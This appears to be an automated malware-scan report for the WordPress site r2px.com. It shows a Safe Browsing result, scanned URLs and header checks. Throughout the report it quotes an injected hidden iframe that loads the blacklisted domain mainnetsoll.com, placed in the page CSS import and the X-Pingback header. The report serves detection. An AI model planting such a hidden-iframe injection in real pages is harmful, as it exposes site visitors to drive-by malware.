Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=r2px.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://r2px.com/ | 200 OK Content-Length: 9502 Content-Type: text/html | malicious |
Page code contains blacklisted domain: mainnetsoll.com ...[1129 bytes skipped]... t;html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>R2Px.com</title> <meta name="generator" content="WordPress 2.3.1" /> <!-- leave this for stats please --> <style type="text/css" media="screen"> @import url( "><iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"></iframe>/wp-content/themes/the-minimalist-right-1.0/style.css ); </style> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://r2px.com/feed" /> <link rel="alternate" type="text/xml" title="RSS .92" href="http://r2px.com/feed/rss" /> <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://r2px.com/feed/atom" /> <link rel="shortcut icon" type="image/x-icon" href="" ...[2935 bytes skipped]... Malicious iFrame found. The same iFrame was found in 8 websites. size: 1x0 style: hidden src: http://mainnetsoll.com/grep/ This URL is marked by Google as suspicious <iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"> | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-includes%2Fjs%2Ftw-sack.js&ver=1.6.1/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-includes/js/tw-sack.js&ver=1.6.1:80 Content-Length: 304 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-includes/js/tw-sack.js&ver=1.6.1:80 LWP::Protocol::http::Socket: getaddrinfo: Имя или служба не известны at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-includes%2Fjs%2Ftw-sack.js&ver=1.6.1/test404page.js | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-includes/js/tw-sack.js&ver=1.6.1:80 Content-Length: 304 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-includes/js/tw-sack.js&ver=1.6.1:80 LWP::Protocol::http::Socket: getaddrinfo: Имя или служба не известны at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-content%2Fplugins%2Femail%2Femail-js.php&ver=2.20/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-content/plugins/email/email-js.php&ver=2.20:80 Content-Length: 315 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-content/plugins/email/email-js.php&ver=2.20:80 LWP::Protocol::http::Socket: getaddrinfo: Имя или служба не известны at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-content%2Fplugins%2Fpostratings%2Fpostratings-js.php&ver=1.20/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-content/plugins/postratings/postratings-js.php&ver=1.20:80 Content-Length: 327 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-content/plugins/postratings/postratings-js.php&ver=1.20:80 LWP::Protocol::http::Socket: getaddrinfo: Имя или служба не известны at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-content%2Fplugins%2Fuseronline%2Fuseronline-js.php&ver=2.20/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-content/plugins/useronline/useronline-js.php&ver=2.20:80 Content-Length: 325 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-content/plugins/useronline/useronline-js.php&ver=2.20:80 LWP::Protocol::http::Socket: getaddrinfo: Имя или служба не известны at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: r2px.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 23:11:22 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: "><iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"></iframe>/xmlrpc.php
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: r2px.com
Referer: http://www.google.com/search?q=r2px.com
Result:
The result is similar to the first query. There are no suspicious redirects found.